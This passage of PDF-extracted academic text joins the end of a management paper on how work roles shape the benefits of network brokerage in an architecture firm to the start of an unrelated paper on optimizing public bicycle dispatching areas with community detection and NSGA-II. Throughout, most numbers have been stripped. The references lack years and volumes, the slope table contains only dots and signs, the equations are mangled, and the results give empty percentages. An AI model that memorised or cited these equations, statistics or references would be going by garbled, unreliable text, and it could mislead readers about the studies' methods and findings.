effect is common for all low-status individuals in an organization (burt and merluzzi, ). high-status versus low- status distinction is not entirely unrelated to the interdependent–independent distinction in our paper as the managers, on average, in our case firm have higher tenure and education levels than professional architects. however, nothing in our interviews and discussions in the company signaled to us about a possible legitimacy problem in the company. the fourth limitation is related to our performance measures. billable hours as a measure of pro fessional’s performance is uniform across all indi viduals, but the idea promotion score merits further examination. superior evaluations have been the most commonly used across previous network studies, despite variation across superiors (teigland and wasko, ). our peer evaluation method’s strongpoint is that it rules out the variance between different supervisors evaluating their subordinates. we considered peer evaluation meaningful, because the size of the firm was rather small, and everyone knew each other since they shared the same open office space. future research could extend the findings of this paper in numerous directions. one direction comes from the contribution of this paper suggesting the independent–interdependent work role as a boundary condition for brokerage. as brokerage theory has been applied to a wide range of work contexts, which might be argued to vary in terms of interdependence, the interdependence aspect has not been at the core of their research design implying that it should be equally well applicable to both. moreover, most of the empirical evidence of benefits of brokerage up until now has been done exclusively with managers, therefore coming from the work that is fundamentally interdependent (e.g. chain managers or investment bankers). further research would be needed to complement brokerage theory with work role point of view to clarify this specific boundary condition. further research could also investigate more how status differences and legitimacy issues between individuals act as boundary conditions. for theorizing this stream of research, brokerage theory could benefit from hypotheses of status differences coming from evolutionary psychology and behavioral economics. management theory’s formal–informal aspects present another future research direction. an innovative approach would be to study the co- existence and effectiveness of formal and informal structures with operationalizing formal structures not only as role hierarchies but also as workflow networks derived from project data and control for clearly work-related communication between superiors and employees. as most professional organizations are not as stratified as architectural firms, participating in the same project would serve as a proxy for formal structure. novel data gathering methods about informal social structure could also be used. since work-related communication is increasingly taking place digitally, communication data can be gathered from databases in addition to self-administered surveys. by analyzing the content of communication by text mining; for example, examining the content of e-mails individuals send each other, and dividing the content between formal and informal communication, would shed light on a multiplicity of relationships, connections efficiency and innovativeness on a large scale, and answer the question as to how these network structures are associated with each other. managerial implications in addition to the theoretical contributions, our study has implications for managers of professional organizations. according to the extant understanding in the managerial practice, successful organizations are both highly efficient in what they do and capable of adapting to changes. typically, in professional organizations, professionals work primarily on tasks requiring specialized skills and competence, and managers work primarily in project management, sales, and offering development. executives of professional organizations, at least in the most artistically and intellectually demanding kind, such as architecture, should therefore proceed with caution with the ideas of flattening formal hierarchies and divisions of labor in their organizations, in order to sustain simultaneous managerial capacity and professional performance. the finding that brokerage affords limited advantage to independent professionals suggests that, contrary to common belief, such people maybe should not invest a great deal of their time in networking and bridge building if that is not what their professional roles require. an informal organization in a professional organization can thus be seen as a mixture of independent professionals and interdependent managers. a successful firm balancing efficiency and adaptation is one that provides room for both independent and interdependent work roles and considers that not everyone should behave as brokers. conclusion in this paper, we examined how work role moderates the advantages of brokerage for role-prescribed performance. our findings suggest that the advantage is contingent upon the work role and brokerage facilitates role-prescribed performance for individuals in interdependent roles but not for those in independent roles. references adler, p. and kwon, s.-w. . “social capital: the good, the bad, and the ugly”, in lesser, e. (ed.), know­ ledge and social capital. foundations and applications. butterworth-heineman, boston, ma, pp. – . adler, p. s. and kwon, s.-w. w. . social capital: prospects for a new concept. academy of management review : – . ahuja, m. k., galletta, d. f. and carley, k. m. . individual centrality and performance in virtual r&d groups: an empirical study. management science : – . amabile, t. m. . creativity in context, vol. xviii boulder, co, pp. antonakis, j. and dietz, j. . looking for validity or testing it? the perils of stepwise regression, extreme- scores analysis, heteroscedasticity, and measurement error. personality and individual differences : – . aral, s. and van alstyne, m. . the diversity- bandwidth trade-off. american journal of sociology : – . bachrach, d. g., powell, b. c., collins, b. j. and richey, r. g. . effects of task interdependence on the relationship between helping behavior and group per- formance. journal of applied psychology : – . barnes, m., kalberg, k., pan, m. and leung, p. . when is brokerage negatively associated with economic benefits? ethnic diversity, competition, and common-pool resources. social networks : – . biancani, s., mcfarland, d. a. and dahlander, l. . the semiformal organization. organization science : – . biddle, b. . recent developments in role theory. annual review of sociology : – . borgatti, s. p., everett, m. g. and johnson, j. c. . analyzing social networks, sage, london. brass, d. j. . structural relationships, job charac- teristics, and worker satisfaction and per formance. administrative science quarterly : – . burt, r. s. . structural holes: the social structure of competition, vol. , harvard university press, cambridge ma, available at: http://books. google.com/books?id=e v cvy hvic burt, r. s. . the contingent value of social capital. administrative science quarterly : – . burt, r. s. . the gender of social capital. rationality and society : – . burt, r. s. . structural holes and good ideas. american journal of sociology : – . burt, r. s. and merluzzi, j. . embedded brokerage: hubs versus locals. research in the sociology of organizations : – . carboni, i. and ehrlich, k. . the effect of relational and team characteristics on individual performance: a social network perspective. human resource management : – . carnabuci, g. and oszegi, d. i. . social networks, cognitive style, and innovative performance: a contingency perspective. academy of management journal : – . cross, r. and cummings, j. n. . tie and network correlates of individual performance in the contingent effect of work roles on brokerage in professional organizations knowledge-intensive work. academy of management journal : – . cummings, t. g. . self-regulating work groups: a socio-technical synthesis. academy of management review : – . dawson, j. f. . moderation in management research: what, why, when, and how. journal of business and psychology : – . emirbayer, m. and goodwin, j. . network analysis , culture, and the problem of agency. american journal of sociology : – . etzioni, a. . modern organizations prentice- hall, englewood cliffs, nj. fang, r., landis, b., zhang, z., anderson, m. h., shaw, j. d. and kilduff, m. . outcomes in organizations integrating personality and social networks: a meta-analysis of personality, network position, and work outcomes in organizations. organization science : – . fleming, l., mingo, s. and chen, d. . collaborative brokerage, generative creativity, and creative success. administrative science quarterly : – . freeman, l. c. . a set of measures of centrality based on betweenness. sociometry : – . granovetter, m. s. . the strength of weak ties. american journal of sociology : – . griffin, m. a., neal, a. and parker, s. k. . a new model of work role performance: positive behavior in uncertain and interdependent contexts. academy of management journal : – . hansen, m. t. . the search-transfer problem: the role of weak ties in sharing knowledge across organization subunits. administrative science quarterly : – . hansen, m. t. and haas, m. r. . competing for attention in knowledge markets: electronic document dissemination in a management consulting company. administrative science quarterly : – . ibarra, h. and andrews, s. b. . power, social influence, and sense making: effects of network centrality and proximity on employee perceptions. administrative science quarterly : – . katz, d. and kahn, r. l. . the social psychology of organizations nd ed., wiley, new york, ny. kleinbaum, a. m., stuart, t. e. and tushman, m. l. . discretion within constraint: homophily and structure in a formal organization. organization science : – . krackhardt, d. . assessing the political landscape: structure, cognition, and power in organizations. admini­ strative science quarterly : – . krackhardt, d. j. . “graph theoretical dimensions of informal organizations”, in carley, k. m. and prietula, m. j. (eds), computational organization theory, l. erlbaum associates, hillsdale, nj, pp. xvii, pp. landis, b. . personality and social networks in organizations: a review and future directions. journal of organizational behavior : s –s . langfred, c. w. . work-group design and autonomy: a field study of the interaction between task interdependence and group autonomy. small group research : – . langfred, c. w. . autonomy and performance in teams: the multilevel moderating effect of task interdependence. journal of management : – . leroy, h., anseel, f., gardner, w. l. and sels, l. . authentic leadership, authentic followership, basic need satisfaction, and work role performance: a cross- level study. journal of management : – . lincoln, j. r. . social structures: a network approach. administrative science quarterly : – . lincoln, j. r. and miller, j. . work and friendship ties in organizations: a comparative analysis of relational networks. administrative science quarterly : – . march, j. g. . exploration and exploitation in organizational learning. organization science : – . marsden, p. ( ), “survey methods for network data”, in scott, j. and carrington, p. j. (eds), the sage handbook of social network analysis, sage publications, london, pp. – . mayhew, b. h. . structuralism versus indi- vidualism: part , shadowboxing in the dark. social forces : – . mcevily, b., soda, g. and tortoriello, m. . more formally: rediscovering the missing link between formal organization and informal social structure. the academy of management annals : – . mehra, a., kilduff, m. and brass, d. j. . the social networks of high and low self-monitors: implications for workplace performance. administrative science quarterly : – . merton, r. . bureaucratic structure and personality. social forces : – . obstfeld, d. . social networks, the tertius iungens orientation, and involvement in innovation. administrative science quarterly : – . padgett, j. f. and ansell, c. k. . robust action and the rise of the medici, - . american journal of sociology : – . pfeffer, j. and salancik, g. r. . determinants of supervisory behavior: a role set analysis. human relations : – . reagans, r. and mcevily, b. . network structure and knowledge transfer: the effects of cohesion and range. administrative science quarterly : – . reagans, r. and mcevily, b. . contradictory or compatible? reconsidering the “trade-off” between brokerage and closure on knowledge sharing. network strategy : – . reagans, r. and zuckerman, e. w. . networks, diversity, and productivity: the social capital of corporate r&d teams. organization science : – . saavedra, r., earley, p. c. and van dyne, l. . complex interdependence in task-performing groups. journal of applied psychology : – . connections scott, j. . social network analysis: a handbook nd ed, sage publications, london. soda, g. and zaheer, a. . a network perspective on organizational architecture: performance effects of the interplay of formal and informal organization. strategic management journal : – . soda, g., stea, d. and pedersen, t. . network structure, collaborative context, and individual creativity. journal of management : – . sparrowe, r. t., liden, r. c., wayne, s. j. and kraimer, m. l. . social networks and the performance of individuals and groups. academy of management journal : – . srivastava, s. b. . intraorganizational network dynamics in times of ambiguity. organization science : – . stajkovic, a. d., lee, d. and nyberg, a. j. . collective efficacy, group potency, and group perfor- mance: meta-analyses of their relationships, and test of a mediation model. journal of applied psychology : – . teigland, r. and wasko, m. . knowledge transfer in mncs: examining how intrinsic motivations and knowledge sourcing impact individual centrality and performance. journal of international management : – . thompson, j. d. . organizations in action mcgraw-hill, new york, ny. tuominen, t. . innovation and development ac- tivities in professional service firms – a role structure per- spective, aalto university publication series doctoral dissertations. wang, j., cheng, g. h., chen, t. and leung, k. . team creativity/innovation in culturally diverse teams: a meta-analysis. journal of organizational behavior : – . wasserman, s. and faust, k. . social network analysis: methods and applications. cambridge university press. new york, ny. weber, m. . “bureaucracy”, in grusky, o. and miller, g. (eds), complex organizations, free press, new york, ny, pp. – . welbourne, t. m., johnson, d. e. and erez, a. . the role-based performance scale: validity analysis of a theory-based measure. academy of management journal : – . table a . simple slopes of the models , , , and . delta method dy/dx se z p > |z| [ % conf. interval] promoting new ideas inv. of burt’s constraint independent work role . . . . . . . . − . . betweenness centrality independent work role . . . . . . . . . . . . billable hours inv. of burt’s constraint independent work role − . . − . . − . − . . . . . − . . betweenness centrality independent work role − . . − . . − . . . . . . − . . note: statistically significant slopes italicized. appendix submitted march accepted september published october corresponding author yang yang, @hdu.edu.cn, yangyang_hdu@ .com academic editor xiangjie kong additional information and declarations can be found on page doi . /peerj-cs. copyright lin et al. distributed under creative commons cc-by . open access urban public bicycle dispatching optimization method fei lin , yang yang , , shihua wang , yudi xu , hong ma and ritai yu school of computer science and technology, hangzhou dianzi university, hangzhou, china current affiliation: institute of intelligent media technology, communication university of zhejiang, hangzhou, china abstract unreasonable public bicycle dispatching area division seriously affects the operational efficiency of the public bicycle system. to solve this problem, this paper innovatively proposes an improved community discovery algorithm based on multi-objective optimization (cdomo). the data set is preprocessed into a lease/return relationship, thereby it calculated a similarity matrix, and the community discovery algorithm fast unfolding is executed on the matrix to obtain a scheduling scheme. for the results obtained by the algorithm, the workload indicators (scheduled distance, number of sites, and number of scheduling bicycles) should be adjusted to maximize the overall benefits, and the entire process is continuously optimized by a multi-objective optimization algorithm nsga . the experimental results show that compared with the clustering algorithm and the community discovery algorithm, the method can shorten the estimated scheduling distance by %– %, and can effectively balance the scheduling workload of each area. the method can provide theoretical support for the public bicycle dispatching department, and improve the efficiency of public bicycle dispatching system. subjects data mining and machine learning, software engineering keywords multi-objective optimization, public bicycle system, community discovery algorithm, regional scheduling workload, elite strategy introduction with the progress of urbanization, people’s awareness of low carbon life and health is increasing. the public bicycle system can provide a green and healthy way to travel, and gradually become an important part of the public transport system. however, the study of the division of public bicycle dispatching area is still in the primary stage. the division of the public bicycle scheduling area has two purposes: decomposing the scheduling between large-scale sites, and reducing the computational complexity of path planning. at present, the mainstream regional division method is based on the urban administrative area, and each area is an independent scheduling area. however, the boundaries of residents’ travel are not as clear as the administrative areas. with the development of the city, the links between the areas are more closely related, so the division based on urban administrative areas is lack of scientific basis. tulabandhula & bodas ( ) proposed a passenger monitoring system for dispatching vehicles in a public transportation network, how to cite this article lin f, yang y, wang s, xu y, ma h, yu r. . urban public bicycle dispatching optimization method. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto: @hdu.edu.cn mailto:yangyang_hdu@ .com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. it monitors passengers at the station, vehicle scheduling information and processed hardware equipment. because the size and population density of each administrative area are different, the number of sites in each area varies greatly. pan, jun-yi & min ( ) designed a heuristic simulated annealing hybrid search algorithm for large-scale vrp distributed problems. firstly, based on the actual road network of gis, the mathematical model is established. secondly, the large-scale vrp path planning problem is studied. the administrative area is large in size and concentrated in population. forma, raviv & tzur ( ) considers the spatial nature of public bicycle rentals, and the original inventory factor of bicycles. then the paper establishes a regional maximum diameter distance constraint model. finally, the best classification results are obtained by heuristic algorithms to minimize the overall inventory cost. therefore, there are more sites, public bicycle turnover is high, and dispatching workload is large; but if there are fewer sites, public bicycle turnover is low, and dispatching workload is small. above all, lack of a scientific planning method often leads to higher scheduling capital costs. schuijbroek, hampshire & hoeve ( ) applied the maximum algebra algorithm to the division of the public bicycle scheduling area, and the paper established the corresponding partition mathematical model. the goal of zoning is to minimize the maximum completion time based on a reasonable level of service. aiming at the problems, this paper proposes an improved community discovery algorithm based on multi-objective optimization. by using this innovative algorithm, the results show that the algorithm brings three major benefits: it can effectively shorten the public bicycle scheduling distance, improve the scheduling efficiency, and effectively balance the workload of regional scheduling. related work the division of the public bicycle dispatching area involves operational research, and researchers have made significant contribution. public bicycles and buses, as well as cargo transport vehicles are public transport, and their operations have similarities. therefore, they can learn dispatching methods from each other. kloimllner (miranda-bront et al., ) decomposes the problem of public bicycles into two sub-problems: scheduling area partitioning and scheduling path planning. then create an integer programming model to achieve as few bicycle rental points as possible. in addition, other researchers chose to use clustering algorithms. phanikrishnakishore & madamsetti ( ) used the rental rules between public bicycle stations, the space of public bicycle stations, and the non-spatial attributes of public bicycle stations, as well as the self-flow characteristics, using association rules to classify sites with strong correlation into the same category. finally, various types of site space enclosed areas serve as the scheduling area for public bicycles. zhang, liang & wei ( ) proposed a public bicycle scheduling area division scheme based on the improved k-means clustering algorithm. in the data analysis, the algorithm effectively estimates the k central sites at the initial central site. after the k-means clustering algorithm is divided, the edge sites are clustered and lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. adjusted again according to the scheduling requirements. xu, qin & ma ( ) integrates the spatial relationship between the sites, and the lease relationship of the bicycle, establishes the similarity matrix of the site, and proposes the parameters of the regional coupling, quantifies the degree of connection between the regions, and finally uses the clustering algorithm to obtain the corresponding result. long, szeto & huang ( ) established a dynamic regional scheduling model, for large-scale public bicycle scheduling problems, and proposed a multi-stage re-optimized dynamic clustering algorithm, integrates optimal division, task balance between regions and regions. within the balance of demand, three factors are progressively clustered, and in the process of solving, the abnormal sites are continuously split to gradually improve the clustering results. dziauddin, powe & alvanides ( ) has studied the public bicycle dispatching area, found that there are often abnormal sites in the division, and he proposed a k-center algorithm, adaptively limits the capacity of the rental site. hartmann tolić, martinović & crnjac milić ( ) analyzed the spatial attributes and community structure of public bicycles, and the paper used the community discovery algorithm to analyze the community structure of public bicycles in washington, london and boston, and verified the existence of community structure in the public bicycle network. the main method of scheduling area division is model method (dubey & borkar, ) and clustering algorithm (sun, zhang & du, ). the model method requires abstract research, and there are many constraints and it is not easy to solve. clustering algorithm is very difficult to determine the number of clusters, and it is difficult to evaluate. moreover, the scheduling workload has no evaluation criteria, and it does not consider whether the workload is balanced. therefore, this paper proposes a new method to solve the problem. scheduling area division model design this part establishes the division model of public bicycle scheduling area, including the description of the model, and the assumptions of some conditions, and some interpretations of the parameters. finally, this chapter will propose a lease/return point demand forecasting model, the data obtained from this model can help this paper verify whether cdomo’s estimated total dispatch distance is the shortest. problem description at present, the clustering algorithm is mainly used to solve the problem of scheduling area division. the data set abbreviated to ds is preprocessed using a data preprocessing program. turn a data set into a lease/return relationship abbreviated to lrr between sites. then, through the similarity calculation between the sites, the similarity matrix abbreviated to sm is generated (yanping, decai & duoning, ). conversion from ds to sm, as shown in eq. ( . ), where rij represents the similarity between site i and site j, qij represents the number of bicycles rented from the site i and returned to the site j, qji represents the number of bicycles rented from the site j and returned to the site i. lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ds c →lrr=   q q q q ··· q j ... q j ... ... qi qi ... ... ··· qij     q q q q ··· q i ... q i ... ... qj qj ... ... ··· qji   c →sm =   r r r r ··· r j ... r j ... ... ri ri ... ... ··· rij   ( . ) the conversion process represented by c and c is as follows: eqs. ( . ), ( . ), m represents the time range, which is based on the number of days: c :progressing program ( . ) c :rij = qij+qji m ( . ) sm =   r r r r ··· r j ... r j ... ... ri ri ... ... ··· rij   ca→dr={r ,r ,...,rn} ( . ) finally, the clustering algorithm abbreviated to ca is used for dividing, rn stands for dividing into n independent scheduling areas is shown in eq. ( . ). if the division result abbreviated to dr conforms to the lease/return law abbreviated to lrl, the user can actively complete a part of the scheduling work to reduce the scheduling workload. however, in the actual scheduling area division, in order to obtain the highest comprehensive benefits, the regional division should not only conform to the law, but also achieve the balance of scheduling workload as much as possible (shpak et al., ). the regional scheduling workload is mainly determined by the distance within the area and the number of stations in the area. z and z should be as small as possible if the regional workload is balanced. this balance problem can be transformed into a multi-objective optimization problem. the objective function f is shown in eq. ( . ): dr={r ,r ,...,rn} moo → minf =[z ,z ] t ( . ) z : variance of the dispatch distance z : variance of the number of sites moo: multi-objective optimization calculation of z in the following eq. ( . ), n represents the number of areas, di represents the estimated dispatch distance of area i, and d represents the average of the estimated dispatch distances: z = n− n∑ i= ( di−d ) ( . ) lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. calculation of z in the following eq. ( . ), n represents the number of areas, ni represents the number of internal sites in area i, and n represents the average number of internal sites: z = n− n∑ i= ( ni−n ) ( . ) s.t. s= [ (si−p)∪(sj−p) ] ∪p ( . ) equation ( . ) indicates that each site must be divided into an area. si and sj represent the partition set. p represents the parking lot sites collection:[ [si−p]∩[sj−p] ] =∅(i = j) ( . ) equation ( . ) indicates that a site can only be divided into an area: si∩p =∅,sj∩p =∅ ( . ) equation ( . ) indicates that each scheduling area contains at least one dispatch center. there are two optimization goals for this issue: • minimize the variance between the estimated dispatch distance between each area; • minimize the variance between the numbers of sites in each area. model assumptions and parameter description the scheduling area dividing process is complicated, and the abstract model involves many parameters. in order to make the model as close as possible to the actual division, before the model is established, some assumptions about the scheduling area dividing process are assumed: • the scheduling distance of each area can be estimated theoretically, the estimated scheduling distance is approximately equal to the actual scheduling distance; • dispatching vehicles are not limited by driving time and mileage; • only one dispatching vehicle in each area is responsible for bicycle dispatch; • model of the dispatching vehicle is consistent with all parameters; • the dispatching vehicle departs from the dispatching center, completes the dispatching task, and then returns to the original dispatching center, regardless of vehicle failure, and other unexpected factors. based on the problem description and model assumptions, the parameters and variables of the model in table are defined. leasing demand forecasting model after the scheduling area is divided, in order to calculate the estimated total distance of the scheduling, it is necessary to ensure that the demand for the lease/return site is known, so it is necessary to predict the scheduling demand for the lease/return site in the future. this section will be divided into -time periods in hours per day named t, t ∈{ , ,..., }. a meteorology similarity weighted k-nearest-neighbour (mswk) method is introduced to predict the number of least and returned bicycle at the site. lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table parameters and variables of the model. based on the problem description and model assump- tions, the parameters and variables of the model are defined. parameters/variables parameter/variable meaning n the number of areas i,j area number di the estimated scheduling distance of the area i dj the estimated scheduling distance of the area j d regional estimated dispatch distance average ni the number of sites in area i nj the number of sites in area j n average number of sites within the area s collection of sites si site division set for area i sj site division set for area j p parking lot site collection table exact values. in the measurement of the similarity of weather, the weather is split into five levels and assigned corresponding values. the exact values are shown in the table. weather value heavy snow, heavy rain snow, light snow, moderate rain, light rain . foggy . sunny and cloudy . leasing number forecast model mswk is an improved method for predicting lease/return bicycle quantity based on knn algorithm. analysed the amount of leasing in a similar time period to predict future leasing. weather, temperature, humidity, winds speed, and visibility are measured in five indicators. in the measurement of the similarity of weather, the weather is split into five levels and assigned corresponding values. the exact values are shown in table . the quantified weather conditions at p and q for two days t is denoted by wdtp and wdtq, respectively, and the weather similarities for t in p and q are defined as follows (eq. ( . )): λ = πσ e − ( w dtp −w dtq ) σ ( . ) the temperatures of the p and q two days t periods are denoted by fdtp and fdtq. the temperature similarities of the t time periods in p and q are defined as follows (eq. ( . )): λ = πσ e − ( f dtp −f dtq ) σ ( . ) lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the three dimensions of humidity, wind speed, and visibility are represented by a -d gaussian kernel function, and hdtp,sdtp,vdtp represents the humidity, wind speed, and visibility of the t time period in p, respectively. the humidity, wind speed, and visibility similarity of p and q periods in t are defined as follows (eq. ( . )): λ = πσ e −   ( h dtp −h dtq ) σ + ( s dtp −s dtq ) σ + ( v dtp −v dtq ) σ   ( . ) in order to simplify the calculation, the temperature, humidity, wind speed, and visibility are normalized and all σ ,σ ,σ ,σ ,σ are set to , thereby simplifying the calculation; finally, by weighting the above three similarity indexes, p and q can be obtained. the overall similarity indicator at time t as follows (eq. ( . )): m ( dtp,d t q;a ) =δw ( dtp,d t q ) ∑ i= aiλi ( . ) where δw ( dtp,d t q ) is a judgment function, when both p and q are working days or all non-working days, δw ( dtp,d t q ) = , otherwise δw ( dtp,d t q ) = . if you want to predict the amount of rent in the t time period in q, select the most similar k days and use the mswk algorithm to calculate the predicted value. the specific eq. ( . ) is as follows: si ·pd ( dtq;a ) = ∑k p= m ( dtp,d t q;a ) si ·pd ( dtp ) ∑k p= m ( dtp,d t q;a ) ( . ) returning number forecast model after a user rents a bicycle, they often return the bicycle to an adjacent site within a certain period of time. therefore, there is a need for prediction data of the number of bicycles based on neighbouring sites, which is used to predict the number of bicycles returned to the site. bicycles rented from site i during time t may be returned to site j adjacent to i during time t or t+ . for the forecast of the number of return bicycles within the lease time t period, it is necessary to first estimate the number of bicycles rented from the site i and at the site j within the time period t. the specific eq. ( . ) is as follows: etij = si ·pd(t) eij ·f si ·pd ( . ) among them, si·pd(t) is the predicted value of bicycle rental quantity from site i in time period t, eij ·f is historical record of bicycle rental from site i and is still at site j. si ·pd is historical total bicycle rental record from site i. through the analysis of historical data, it is found that the user’s riding time law can be fitted by the -gaussian function. therefore, the riding time dij(t)between rental sites i and j can be estimated by eq. ( . ): dij(t)=g (t;µ ,σ )+g (t;µ ,σ ). ( . ) lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. assume that the user’s return time is evenly distributed, and the user’s behaviour of returning the leased bicycle is completed within the t time period or t+ -time period. during the time periods t and t+ , the user t rents a bicycle from the site i at the moment, and the probability of returning the ticket at the site j at t is as follows (eqs. ( . ) and ( . )): ptij = |t| ∫ |t| ∫ |t|−t ′ dt ′ dt dij(t ) ( . ) pt+ ij = |t| ∫ |t| ∫ +∞ |t|−t ′ dt ′ dt dij(t ). ( . ) finally, considering the traffic patterns and the corresponding probabilities of the adjacent sites, the formula for predicting the number of return bicycles within the sites is obtained as follows: si ·dd(t)= ∑ j =i etijp t ij+e t− ij p t+ ij . ( . ) so far, the demand n of the site i at the time t in the future will be calculated by combining the demand for rental and return of the rental site i at the time t in the future. the specific formula is as follows: n = si ·dd(t)−si ·pd(t). ( . ) if n is less than zero, it means that the site i will not be able to meet the user’s bicycle rental demand at the time t in the future, and it is necessary to dispatch the bicycle through dispatch (feng, zhu & liu, ). if n is greater than the number of parking spots at the leased site, it means that the site i at the time t in the future cannot satisfy the user’s demand for returning the car. it is necessary to reduce the number of bicycles by scheduling. community discovery algorithm based on multi-objective optimization community discovery algorithm based on multi-objective optimization, which combines quantitative indicators of regional scheduling workloads, community discovery algorithms (shivach, nautiyal & ram, ), and multi-objective optimization algorithms (mori & saito, ). firstly, the fast unfolding community discovery algorithm (sun et al., ) is performed based on the similarity matrix of the site. secondly, the workload adjusts the results of the community discovery algorithm. throughout the process, the results are continuously optimized through a multi-objective optimization algorithm. cdomo scheduling workload analysis scheduling workload is an indicator to measure the workload of a dispatch line. the scheduling itself involves many fields, so there is no uniform standard (kim, jeong & lee, ). the generalized scheduling workload is mainly determined by the scheduling distance, the delivery volume and the number of service outlets. the three parameters lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. are weighted and integrated, and the workload of the dispatching line can be quantified. suppose w is the generalized scheduling workload, d is the driving distance (km), n is the number of outlets (pieces), s is the delivery amount (pieces), and ρ ,ρ ,ρ is the driving distance weight, the delivery amount weight, and the service outlet quantity weight as follows eq. ( . ): w =ρ ·d+ρ ·n +ρ ·s ( . ) this paper combines generalized scheduling workload with public bicycles, and then obtains a quantitative formula for regional scheduling workload, wi is the scheduling workload of area i, and di is the scheduling distance of area i, which is calculated by the maximum generation star algorithm. ni is the number of stations in area i, si is the number of stations in area i, and ρ ,ρ ,ρ is the corresponding weight coefficient as follows eq. ( . ): wi=ρ ·di+ρ ·ni+ρ ·si ( . ) since the regional scheduling is based on all stations in the entire area, and in the scheduling area division stage, the waiting scheduling sites and scheduling quantities of each area are unknown, so in this paper, the impact of si on the scheduling workload is ignored, that is, let ρ = . so, the eq. ( . ) can be simplified to: wi=ρ ·di+ρ ·ni. ( . ) in the quantitative formula of scheduling workload, the weight coefficient cannot be determined manually, but when the scheduling workload balance is satisfied, the estimated scheduling distance variance in each area, and the variance of the number of stations in each area should be as small as possible, so the scheduling balance the problem can be turned into a multi-objective optimization problem. the objective function is min f =[z ,z ]t . nsga is the most popular multi-objective genetic algorithm. nsga first genetically manipulates the population p to obtain the population q; then the populations are combined and then combined with non-inferior sorting and crowding distance sorting, and then a new population is established. repeat the above process, until the termination condition is met. the detailed process is as follows: ( ) randomly generate the initial population p , then sort the populations non-inferiorly, and assign a non-dominant value to each individual; then perform the operations of selection, crossover, and mutation on the initial population p to obtain a new population q , set to i= . ( ) combine the populations of the father and offspring, then form a new population ri=pi∪qi, and then sort the population ri non-inferiorly to obtain the non-inferior layer f , f , ···. ( ) perform replication, crossover, and mutation operators on population pi+ to form population qi+ . ( ) if the termination condition holds, then it ends; otherwise, i = i+ , go to step ( ). the main process diagram of nsga is shown in fig. : this paper uses the nsga multi-objective optimization algorithm to resolve the scheduling area partition model (wu, ). the length of the chromosome in nsga lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the main process of nsga algorithm. full-size doi: . /peerjcs. /fig- is (basch et al., ), which corresponds to the value of the weight parameter in the area scheduling workload. each individual corresponds to a scheduling workload formula, based on schedule the workload adjustment community found the results of the division. figure shows the restricted flow of nsga algorithm. cdomo algorithm design community discovery algorithm built on multi-objective integrates quantitative indicators of regional scheduling workloads, community discovery algorithms and multi-objective optimization algorithms. firstly, the fast unfolding community discovery algorithm is implemented based on the similarity matrix of the least sites; secondly, the workload index is used to adjust the results of the community discovery algorithm. the entire process continuously optimizes the results from a multi-objective optimization algorithm. table displays the detailed algorithm calculation. experiment and analysis the rest of the paper is part of the experiment and analysis. the experimental section was divided into two groups, which were experiments using new york public bicycle data and chicago public bicycle data. in the analysis section, the two groups of experiments use k-means clustering algorithm, and fast unfolding community discovery algorithm as comparisons, it compares the three aspects of the number of rental sites, the variance of the number of scheduled bicycles, and the estimated total distance of scheduling. the comparative data show that the algorithm is effective against both sets of experiments. lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure specific flow of nsga algorithm. full-size doi: . /peerjcs. /fig- new york public bicycle data set introduction citi bikes (jiang et al., ) is a people-benefit project launched by the new york city government. figure displays the spatial distribution of rental sites. blue represents manhattan, with rental sites; green represents brooklyn, with sites. each citi bicycle rental site has gps location information, so it is not difficult to locate the rental site. the system records the user’s data onto each cycle. the package contains the location and time data onto the start and the end of the site, the entire riding process, the bicycle id, and the user’s gender and birth date. this experiment will use the may rent-return dataset of new york public bicycles to conduct an experiment, a total of , and rent-return data. the dataset contains fields, and the nine fields related to this experiment are shown in table . this paper uses the pre-processing program to process the leased data, it turned into the lease-return relationship between the least sites (guo et al., ). it also generates a similarity matrix based on the rent-return relationship. the similarity calculation formula lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table detailed algorithm calculation. algorithm: community discovery algorithm based on multi-objective optimization input: site similarity matrix x, population number popsize, maximum number of iterations maxgen. output: optimal regional division results ρ∗ , and workload index parameters ρ ∗ . . initialize the historical optimal solution f ∗ and its workload index parameter ρ∗ ,ρ ∗ . . perform a pass phrase of the fast unfolding community discovery algorithm, and obtain the results of the preliminary zoning division as r. . calculate the estimated distance di of each area in r, number of regional sites ni. . individual genes in the population as weight coefficients ρ ,ρ . finally, the scheduling workload of each area is calculated by the formula wi =ρ ·di+ρ ·ni. the variance of the regional workload is denoted as v. . for each rental site i, try to put i into other communities and calculate the incremental v of the adjustment workload, the entire process records the maximum vmax and the corresponding community k. if vmax < , site node i does not adjust; if vmax > , node i is adjusted to community k. traverse all the site until all the site are adjusted and the result is recorded as r∗. . define the variance function f of the regional site, and define the regional dispatch distance variance function f , they are two objective functions to perform fast non-dominated sorting on the results, the records of the optimal solution in the contemporary population as f ′ , and its corresponding scheduling workload parameters are denoted as ρ ′ ,ρ ′ . if f ′ > f ∗ after comparison, letting ρ∗ =ρ ′ ,ρ ∗ =ρ ′ . . determine whether the number of program iterations exceeds the maximum number of iterations maxgen. if it exceeds, the optimal regional division results, and workload in- dex parameters ρ∗ ,ρ ∗ are output; otherwise, a new population is generated through elite strategy selection, which can ensure that certain elite individuals will not be discarded during the evolution process, thereby improving the accuracy of the optimization re- sults, and expanding the sampling space. and gene crossover and mutation processes and the execution continue from 